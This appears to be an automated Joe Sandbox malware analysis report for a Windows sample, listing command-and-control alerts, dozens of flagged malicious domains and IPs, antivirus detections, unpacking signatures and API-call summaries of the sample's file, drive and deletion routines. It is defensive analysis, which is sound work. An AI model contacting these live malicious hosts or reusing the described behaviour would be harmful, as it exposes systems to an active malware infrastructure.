2024-11-11T18:08:36.740328+010028048521Malware Command and Control Activity Detected192.168.2.9626483.94.10.3480TCP
2024-11-11T18:08:37.395138+010028048521Malware Command and Control Activity Detected192.168.2.962650199.191.50.8380TCP
2024-11-11T18:08:43.540877+010028048521Malware Command and Control Activity Detected192.168.2.962658178.162.203.21180TCP
2024-11-11T18:08:43.858147+010028048521Malware Command and Control Activity Detected192.168.2.962667199.59.243.22780TCP
2024-11-11T18:08:43.858329+010028048521Malware Command and Control Activity Detected192.168.2.962643208.100.26.24580TCP
2024-11-11T18:08:50.600526+010028048521Malware Command and Control Activity Detected192.168.2.962366178.162.203.21180TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: uavINoSIQh.exeAvira: detected
Antivirus detection for URL or domain
Source: http://ww25.lyxynyx.com/login.php?subid1=20241112-0407-4879-ab0a-fce34aca034aAvira URL Cloud: Label: malware
Source: http://gaqykoz.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopycoc.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekyqoq.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojyzyt.com/login.phpAvira URL Cloud: Label: malware
Source: http://pujylog.com/http://pujylog.com/HAvira URL Cloud: Label: malware
Source: http://qekysel.com/http://lykyser.com/http://vofyzof.com/http://qeqyqep.com/Avira URL Cloud: Label: malware
Source: http://pupymol.com/login.phpAvira URL Cloud: Label: malware
Source: http://qeqykop.com/login.phpAvira URL Cloud: Label: malware
Source: http://vowydef.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyrywoj.com/login.phpAvira URL Cloud: Label: malware
Source: https://qegyhig.com/PrAvira URL Cloud: Label: malware
Source: http://lyrynux.com/HAvira URL Cloud: Label: malware
Source: http://puzytul.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyvax.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvymej.com/login.phpAvira URL Cloud: Label: malware
Source: http://gadykos.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumygyp.com/Avira URL Cloud: Label: malware
Source: http://puvycel.com/login.phpAvira URL Cloud: Label: malware
Source: http://qedysyp.com/Avira URL Cloud: Label: phishing
Source: http://vowypim.com/login.phpAvira URL Cloud: Label: malware
Source: http://pufycol.com/login.phpcom/login.phpAvira URL Cloud: Label: malware
Source: http://qedyhyl.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyryled.com/login.phpAvira URL Cloud: Label: malware
Source: http://lymyner.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzymup.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekyhil.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojyduf.com/login.phpAvira URL Cloud: Label: malware
Source: http://qedyhiq.com/HAvira URL Cloud: Label: malware
Source: http://gatyqeb.com/HAvira URL Cloud: Label: malware
Source: http://ganydeh.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzytap.com/login.phpAvira URL Cloud: Label: malware
Source: http://qegyval.com/login.phpAvira URL Cloud: Label: malware
Source: http://qetyxiq.com/Avira URL Cloud: Label: malware
Source: http://lyxymin.com/Avira URL Cloud: Label: phishing
Source: http://vopygat.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lygyxux.com/login.phpAvira URL Cloud: Label: malware
Source: http://gahycuz.com/PAvira URL Cloud: Label: malware
Source: http://galyhib.com/login.phpAvira URL Cloud: Label: malware
Source: http://gacycaz.com/login.phpAvira URL Cloud: Label: phishing
Source: http://gadyhoh.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumyjip.com/login.php?Avira URL Cloud: Label: malware
Source: http://gahynuw.com/login.phpAvira URL Cloud: Label: malware
Source: https://puzylyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://qeqyxyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://gadydow.com/login.phpAvira URL Cloud: Label: malware
Source: http://lygyjuj.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxynyx.com/login.phpnAvira URL Cloud: Label: malware
Source: http://pumyjip.com/login.phpAvira URL Cloud: Label: malware
Source: http://qegyfyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumytup.com/login.phpAvira URL Cloud: Label: malware
Source: http://purylup.com/Avira URL Cloud: Label: malware
Source: http://qedykiv.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxyxox.com/login.phpAvira URL Cloud: Label: malware
Source: http://gacyqoz.com/http://lygyfej.com/http://vocyqot.com/http://gacyqoz.com/HAvira URL Cloud: Label: phishing
Source: http://vocypok.com/login.phpAvira URL Cloud: Label: malware
Source: http://puvygyv.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekyqop.com/login.phpAvira URL Cloud: Label: malware
Source: http://purywoq.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyjif.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofydak.com/login.phpAvira URL Cloud: Label: malware
Source: http://pupywog.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvytuj.com/http://vojyjof.com/http://vojyjof.com/Avira URL Cloud: Label: malware
Source: http://pujymiq.com/login.phpAvira URL Cloud: Label: malware
Source: http://gacynuz.com/login.phpAvira URL Cloud: Label: malware
Source: http://galyqaz.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxysad.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxylux.com/Avira URL Cloud: Label: malware
Source: http://gatyniz.com/HAvira URL Cloud: Label: malware
Source: http://lykyjad.com/login.phpAvira URL Cloud: Label: malware
Source: http://gahyzez.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyzic.com/login.phpAvira URL Cloud: Label: malware
Source: http://puryxuv.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopymyc.com/login.phpAvira URL Cloud: Label: malware
Source: http://pufybyv.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykygur.com/Avira URL Cloud: Label: malware
Source: http://lygygux.com/http://pumypop.com/http://lyxywen.com/http://vojyjot.com/http://ganypis.com/http:Avira URL Cloud: Label: phishing
Source: http://galyfis.com/Avira URL Cloud: Label: malware
Source: http://vojycec.com/Avira URL Cloud: Label: malware
Source: http://pujygug.com/login.phpAvira URL Cloud: Label: malware
Source: http://pujydap.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykymij.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyvan.com/login.phpAvira URL Cloud: Label: malware
Source: http://purywoq.com/Avira URL Cloud: Label: malware
Source: http://lykyfen.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykywid.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumydyg.com/login.phpAvira URL Cloud: Label: malware
Source: http://qexylup.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopycyf.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lysyxuj.com/login.phpAvira URL Cloud: Label: malware
Source: http://pupylug.com/pAvira URL Cloud: Label: malware
Source: http://gacykas.com/login.phpAvira URL Cloud: Label: malware
Source: http://vocymak.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatyveh.com/login.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: uavINoSIQh.exeReversingLabs: Detection: 84%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: uavINoSIQh.exeJoe Sandbox ML: detected

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.2640000.5.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\uavINoSIQh.exeUnpacked PE file: 0.2.uavINoSIQh.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: uavINoSIQh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.9:56876 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:56880 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:56896 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:56920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:56942 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:54965 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:54978 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:55002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:55020 version: TLS 1.2
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2620449428.0000000004493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626024029.0000000008B4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wkernelbase.pdbcom.lyxynejpS source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbRSDS0B source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2615235923.0000000002F05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: svchost.exe, 00000002.00000002.2626024029.0000000008B49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.2615235923.0000000002F05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb\??\C:\Program Files (x86)\Windows Defender\dll\winsta.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wkernelbase.pdbe86303.dscx.akamaiedge.net source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb\* source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2636696382.000000000D749000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.2604726321.0000000000848000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2622345963.0000000006F7B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626024029.0000000008B54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1827672077.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1727427043.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1827636653.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000000.1743054464.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000000.1771298609.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000000.1782573513.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000000.1785980185.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000000.1812207683.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1908463497.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000000.1834505436.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000000.1851337162.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000024.00000000.1879363277.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000027.00000002.2033250591.000000000033E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\WinSCard.pdbb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\winsta.pdb\*b source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.2626024029.0000000008B4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2636696382.000000000D749000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\winsta.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\lygyvon.comp source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\WinSCard.pdb* source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2620449428.0000000004493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Users\user\AppData\Roaming\8a99a31f\sysinfo.log source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb* source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb( source: svchost.exe, 00000002.00000002.2626024029.0000000008B49000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02669910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02669910
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02647680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02647680
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_0266DA50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_0266DAE8
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0265D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_0265D120
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0265E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_0265E6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0133D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_0133D120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01349910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_01349910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0134DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_0134DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0134DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_0134DAE8
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0133E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_0133E6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01327680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_01327680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_013FD120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01409910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_01409910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0140DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0140DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0140DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0140DAE8
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013FE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_013FE6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013E7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_013E7680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01539910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_01539910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0152D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_0152D120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0153DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_0153DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0153DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_0153DAE8
